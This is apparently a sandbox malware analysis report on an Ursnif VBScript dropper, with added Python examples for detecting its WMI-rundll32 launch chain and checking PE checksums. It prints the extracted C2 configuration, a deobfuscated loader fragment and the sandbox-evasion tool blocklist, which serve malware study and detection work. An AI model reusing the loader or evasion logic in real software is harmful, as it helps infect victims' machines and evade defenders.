Windows Analysis Report
gnAYDP69br2v.vbs

Overview

General Information

Sample Name: gnAYDP69br2v.vbs
Analysis ID: 560537
MD5: 694a1a5ee37e5c161a37d4166a677850
SHA1: adfdbca254f8f810735cf2224aca1630af762bea
SHA256: 0993c606df923ac8f174d7789fb494633c89d99d48747a91b866dc410cbd5814

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Antivirus detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Deletes itself after installation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

AV Detection

Source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "YH51zbw68XXolzw8uQmujXgr7vnasuZcFgH7AJ2kGBzL4PhjIyVzy5MDJsglBibg5h0RNR44WiefAtoK6SAdWueylFfdzQd683oCOk4rKCggPtdTeSl7hrve2I0aDaCBkoeiOxpSRC00pY0DaAjoBH1DxdU5ti0d0lMA4aqyGSJ+NcMQxJbjly/3eM1JgxTeRv8qfeoCn1t6fo9nKZliSXvxzEf8TXf46mNAineKBDDVsAYvylxjeMV9NuQnAN5bCZLiyp7C5x9eiMqtTEAUnFh9cMrGskg6XvfPGY7auFDj9EDMWtYHKhgHVdRDPVkTTSsGy44FUesZ+6Z4Xw7vU9rgofRZORY0rQQe0OFqz4s=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "gX5RILpAQgp3pEaS", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Source: C:\Users\user\AppData\Local\Temp\melange.yuv Avira: detection malicious, Label: TR/AD.UrsnifDropper.vsbvn
Source: Binary string: c:\shell\town.Woman\interest\will.pdb source: rundll32.exe, 00000017.00000002.882547399.0000000070017000.00000002.00000001.01000000.0000000C.sdmp, melange.yuv.0.dr
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7000EEA1 FindFirstFileExW, 23_2_7000EEA1

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Source: Yara match File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA2274 23_2_6FFA2274
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7000CA4A 23_2_7000CA4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70003761 23_2_70003761
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 70002290 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA14FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 23_2_6FFA14FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA1B4A NtMapViewOfSection, 23_2_6FFA1B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA1382 GetProcAddress,NtCreateSection,memset, 23_2_6FFA1382
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA2495 NtQueryVirtualMemory, 23_2_6FFA2495
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Source: gnAYDP69br2v.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs"
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: classification engine Classification label: mal100.troj.evad.winVBS@6/2@0/0
Source: gnAYDP69br2v.vbs Static file information: File size 2488066 > 1048576
Source: Binary string: c:\shell\town.Woman\interest\will.pdb source: rundll32.exe, 00000017.00000002.882547399.0000000070017000.00000002.00000001.01000000.0000000C.sdmp, melange.yuv.0.dr
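The launch chain listed above (wscript.exe issuing Win32_Process::create, WmiPrvSE.exe appearing as the parent of rundll32.exe, and rundll32 loading a file named melange.yuv through its DllRegisterServer export) is the part of this report a detection engineer would turn into a rule. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's own "Process created:" lines (copied verbatim as constructed input) and applies three heuristics to each event. The function names, the %TEMP% path check and the finding texts are mine, not anything the sandbox emits.

```python
"""
Added example, not part of the Joe Sandbox report: parse the report's
"Process created:" lines into events and flag what makes this launch chain
unusual. Function names, the temp-path heuristic and the finding texts are my
own; the four input lines are copied from the report.
"""
import re

# Constructed input: the process-creation lines from the System Summary section.
REPORT_LINES = [
    r'Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs"',
    r'Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding',
    r'Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer',
    r'Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer',
]

# "Source: <parent> Process created: <image> <command line>"
LINE_RE = re.compile(r'^Source: (?P<parent>.+?) Process created: (?P<image>\S+) (?P<cmdline>.*)$')
# rundll32 syntax: rundll32[.exe] <module>,<export> [args]; the module may be quoted
RUNDLL_RE = re.compile(r'^rundll32(?:\.exe)?\s+"?(?P<module>[^",]+)"?,(?P<export>\w+)', re.IGNORECASE)

def basename(path: str) -> str:
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()

def parse_events(lines):
    """Return one dict (parent, image, cmdline) per parsable 'Process created' line."""
    return [m.groupdict() for m in map(LINE_RE.match, lines) if m]

def findings_for(ev) -> list:
    """Heuristics for one event; each string is one reason to look closer."""
    out = []
    parent, image = basename(ev['parent']), basename(ev['image'])
    if parent == 'wmiprvse.exe':
        # Win32_Process.Create makes the WMI host the parent, so the real
        # initiator (wscript.exe here) is missing from the parent chain.
        out.append('spawned by WmiPrvSE.exe (WMI Win32_Process.Create breaks the parent chain)')
    if image == 'rundll32.exe':
        m = RUNDLL_RE.match(ev['cmdline'])
        if m:
            module, export = m.group('module'), m.group('export')
            ext = basename(module).rsplit('.', 1)[-1] if '.' in basename(module) else ''
            if ext != 'dll':
                out.append(f'rundll32 loads a PE with extension ".{ext}" via {export}')
            if '\\appdata\\local\\temp\\' in module.lower():
                out.append('module loaded from %TEMP%')
        if parent == 'rundll32.exe' and 'syswow64' in ev['image'].lower():
            out.append('64-bit rundll32 re-launched its SysWOW64 copy (32-bit module)')
    return out

def triage(lines):
    """Events that tripped at least one heuristic, keyed by image path."""
    return {ev['image']: f for ev in parse_events(lines) if (f := findings_for(ev))}

if __name__ == '__main__':
    for image, reasons in triage(REPORT_LINES).items():
        print(image)
        for reason in reasons:
            print('   -', reason)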

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: (script buffer captured by AMSI; the report rendered it as one run-on line, statement breaks are restored below; the fragment starts mid-function and is cut off at the end)
WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)
REM feud policy theology irate liven comparator Ralph megavolt televise gift alarm cultivable javelin ovary Rufus craven bevy hunt ugly marrowbone magnetic
End With
Dim quadrupole: Set quadrupole = CreateObject("WScript.Shell")
Dim Ijil: Set Ijil = CreateObject("Scripting.FileSystemObject")
If (Ijil.FileExists(SvurK + "adobe.url")) Then
' clubhouse turbulent delegate, 5083367 intend academia involution imperishable convulsion fee clandestine springtime stearic tibia condemnatory crook handkerchief orphanage tepid fence teapot
ocph("DEBUG: F_LOCKFILE - False")
ROp
Else
With quadrupole.createShortcut(SvurK + "adobe.url")
.TargetPath = "https://adobe.com"
.Save()
End With
ocph("DEBUG: F_LOCKFILE - True")
' salon Coddington fast McBride sunset February croft mannequin acuity purvey vindictive
End If
End Function
Function weHra()
ocph("DEBUG: F_RUN - Start")
UuH=60000
' strontium deoxyribose testicle carpetbagger thulium lye Silas standpoint confirm lavish ragging, raven broadloom collar moral, Mecca standard songbird Harlan earnest exfoliate
soupy=40000
Randomize
Set BYkLiService = GetObject("winmg" + "mts:Win32_Pro" + "cess")
REM spill family towhead honeysuckle alkaloid. 4079355 wholesome usurpation sheath suffer oilmen whimsey emerald Morgan, 4462814
If (InStr(WScript.ScriptName, cStr(58462)) > 0 And sapsucker = 0) Then
Chiang
With WScript
.Sleep Int((UuH-soupy+1)*Rnd+soupy)
End With
archetype471 = "ca" + "lc.e" + "xe"
' eft enormous Muzak Thor Polynesia pendant Dempsey contraception phosphide blockade belie clement covariant deadhead debilitate petrochemical amide
BYkLiService.create archetype471
ocph("DEBUG: F_RUN_T - True")
Else
Chiang
With WScript
.Sleep Int((UuH-soupy+1)*Rnd+soupy)
End With
UCTw = "rundll32" + " " + SvurK + "melange.yuv" + ",DllRegisterServer":BYkLiService.create UCTw
ocph("DEBUG: F_RUN_W - True")
alLA("-")
EMEx
End If
End Function
Function VuibL()
ocph("DEBUG: FS_CLB - Start")
' fortunate assonant atrophic absolution estimate lovelorn vegetate, plumb pappy stillwater schoolgirlish
on error resume next
Dim UuH,soupy
REM saloon Pritchard sadden. indolent rancho Semite Harrington inflater stoneware bemadden. Rochester drake800 Shattuck
UuH=5000
soupy=2000
Randomize
WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)
set BYkLi = GetObject("winmgmts:\\.\root\cimv2")
' thunderflower niece mountaintop diverse roost putty duel compressible Buchenwald immutable Fomalhaut. 8154240 wont crowd carcass grownup dialectic taught curtain confederate invoke denouement
set FtLaZ = BYkLi.InstancesOf("Win32_OperatingSystem")
for each hSW in FtLaZ
aesthetic = hSW.LastBootUpTime
' souvenir minuscule committal Havana heartbreak f cure helicopter tung Gorton, backorder Midwest
jFE = Mid(aesthetic,1,4) & "-" & Mid(aesthetic,5,2) & "-" & Mid(aesthetic,7,2) & " " & Mid(aesthetic,9,2) & ":" & Mid(aesthetic,11,2) & ":" & Mid(aesthetic,13,2)
monologistec = abs(datediff("s",jFE,now))
ZuAV = monologistec \ 60
REM hut orange copperhead selfadjoint clomp byline approximate t
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA2263 push ecx; ret 23_2_6FFA2273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA2210 push ecx; ret 23_2_6FFA2219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_700022D6 push ecx; ret 23_2_700022E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70001C44 push ecx; ret 23_2_70001C57
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7004C4C0 push ebx; iretd 23_2_7004C4D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7004D302 push edx; ret 23_2_7004D306
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA1A0A LoadLibraryA,GetProcAddress, 23_2_6FFA1A0A
Source: melange.yuv.0.dr Static PE information: real checksum: 0xab069 should be: 0xb1a89
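The checksum finding above compares the value stored in the optional header with what the PE checksum algorithm yields for the file as it sits on disk. The Python below is an added example, not code from the report or from the sample: it implements that algorithm (the one imagehlp's CheckSumMappedFile uses), locates the CheckSum field from e_lfanew, and runs both on a headers-only PE32 image constructed here, so the "real ... should be ..." pair can be reproduced for any file. The demo image, its 312-byte layout and the function names are mine.

```python
"""
Added example, not taken from the report or from the sample: recompute
IMAGE_OPTIONAL_HEADER.CheckSum the way imagehlp's CheckSumMappedFile does, so
a "real checksum X should be Y" finding can be reproduced for any PE. The
headers-only PE32 image built by build_demo_pe() is constructed for this demo.
"""
import struct

def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Sum the file as little-endian DWORDs with end-around carry, skipping the
    CheckSum field, fold to 16 bits, then add the file length."""
    assert checksum_offset % 4 == 0, 'CheckSum field is DWORD aligned in a well-formed PE'
    padded = data + b'\0' * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:          # the field itself is excluded
            continue
        total += struct.unpack_from('<I', padded, off)[0]
        if total > 0xFFFFFFFF:              # fold the carry back in
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def checksum_field_offset(data: bytes) -> int:
    """e_lfanew + PE signature (4) + IMAGE_FILE_HEADER (20) + 64: CheckSum sits
    at the same offset in PE32 and PE32+ optional headers."""
    if data[:2] != b'MZ':
        raise ValueError('not an MZ image')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('PE signature not found')
    return e_lfanew + 4 + 20 + 64

def verify(data: bytes):
    """Return (stored, computed): the pair the report prints as 'real' and 'should be'."""
    off = checksum_field_offset(data)
    return struct.unpack_from('<I', data, off)[0], pe_checksum(data, off)

def build_demo_pe(stored_checksum: int = 0) -> bytes:
    """Headers-only PE32 DLL image (312 bytes), constructed for this example."""
    e_lfanew = 0x40
    dos = b'MZ' + b'\0' * (0x3C - 2) + struct.pack('<I', e_lfanew)
    # Machine=i386, 0 sections, no timestamp/symbols, SizeOfOptionalHeader=0xE0,
    # Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL
    coff = struct.pack('<HHIIIHH', 0x14C, 0, 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into('<H', opt, 0, 0x10B)               # PE32 magic
    struct.pack_into('<I', opt, 64, stored_checksum)    # CheckSum field
    return dos + b'PE\0\0' + coff + bytes(opt)

if __name__ == '__main__':
    stored, computed = verify(build_demo_pe(0))
    print(f'real checksum: {stored:#x} should be: {computed:#x}')
```

A mismatch like the one reported for melange.yuv is weak evidence on its own: the user-mode loader does not enforce the field (the kernel checks it for drivers), and many legitimately built binaries carry a zero. A non-zero value that is wrong is more interesting, because it usually means the image was patched or packed after the linker wrote the header, which is consistent with the unpacking activity this report shows in rundll32.exe.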

Persistence and Installation Behavior

Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\melange.yuv

Hooking and other Techniques for Hiding and Protection

Source: Yara match File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\gnaydp69br2v.vbs
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory strings (analysis-tool process names; adjacent dump bytes such as "@", "IK", ";HQ" stripped and repeats collapsed): APISPY.EXE, AUTORUNS.EXE, AUTORUNSC.EXE, BEHAVIORDUMPER.EXE, DUMPCAP.EXE, EMUL.EXE, FAKEHTTPSERVER.EXE, FILEMON.EXE, FORTITRACER.EXE, FRIDA-WINJECTOR-HELPER-32.EXE, FRIDA-WINJECTOR-HELPER-64.EXE, HOOKANAAPP.EXE, HOOKEXPLORER.EXE, IDAG.EXE, IDAQ.EXE, IMPORTREC.EXE, IMUL.EXE, NETSNIFFER.EXE, OLLYDBG.EXE, PEID.EXE, PETOOLS.EXE, PROCMON.EXE, REGMON.EXE, REGSHOT.EXE, SANDBOXIEDCOMLAUNCH.EXE, SANDBOXIERPCSS.EXE, SBIECTRL.EXE, SBIESVC.EXE, SCKTOOL.EXE, SYSANALYZER.EXE, TCPDUMP.EXE, WINDBG.EXE, WINDUMP.EXE, WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory strings (same cleanup): APISPY.EXE, AUTORUNS.EXE, AUTORUNSC.EXE, BEHAVIORDUMPER.EXE, FORTITRACER.EXE, FRIDA-WINJECTOR-HELPER-32.EXE, FRIDA-WINJECTOR-HELPER-64.EXE, HOOKANAAPP.EXE, HOOKEXPLORER.EXE, IDAG.EXE, IDAQ.EXE, IMPORTREC.EXE, IMUL.EXE, OLLYDBG.EXE, PEID.EXE, PETOOLS.EXE, PROCMON.EXE, SANDBOXIERPCSS.EXE, SBIECTRL.EXE, SBIESVC.EXE, SCKTOOL.EXE, SYSANALYZER.EXE, TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.739566081.00000274BF6FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string (tail of the script's own blocklist array as it appears in the dump; the first entry is cut off): ULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Source: C:\Windows\System32\wscript.exe TID: 7144 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 375
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7000EEA1 FindFirstFileExW, 23_2_7000EEA1

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70002116 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_70002116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA1A0A LoadLibraryA,GetProcAddress, 23_2_6FFA1A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_700081A6 mov eax, dword ptr fs:[00000030h] 23_2_700081A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7000EB9A mov eax, dword ptr fs:[00000030h] 23_2_7000EB9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7004A96D mov eax, dword ptr fs:[00000030h] 23_2_7004A96D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7004A89C mov eax, dword ptr fs:[00000030h] 23_2_7004A89C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7004A4A3 push dword ptr fs:[00000030h] 23_2_7004A4A3
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70001E38 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_70001E38
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70006707 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_70006707

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe File created: melange.yuv.0.dr

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 23_2_6FFA11BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_70009925
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 23_2_7001234F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 23_2_70011BC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 23_2_70012524
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 23_2_70009E09
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_70011E65
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_70011EB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_70011F4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_700022EB cpuid 23_2_700022EB
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA10ED GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 23_2_6FFA10ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA1F7C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 23_2_6FFA1F7C

Lowering of HIPS / PFW / Operating System Security Settings

Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information

Source: Yara match File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
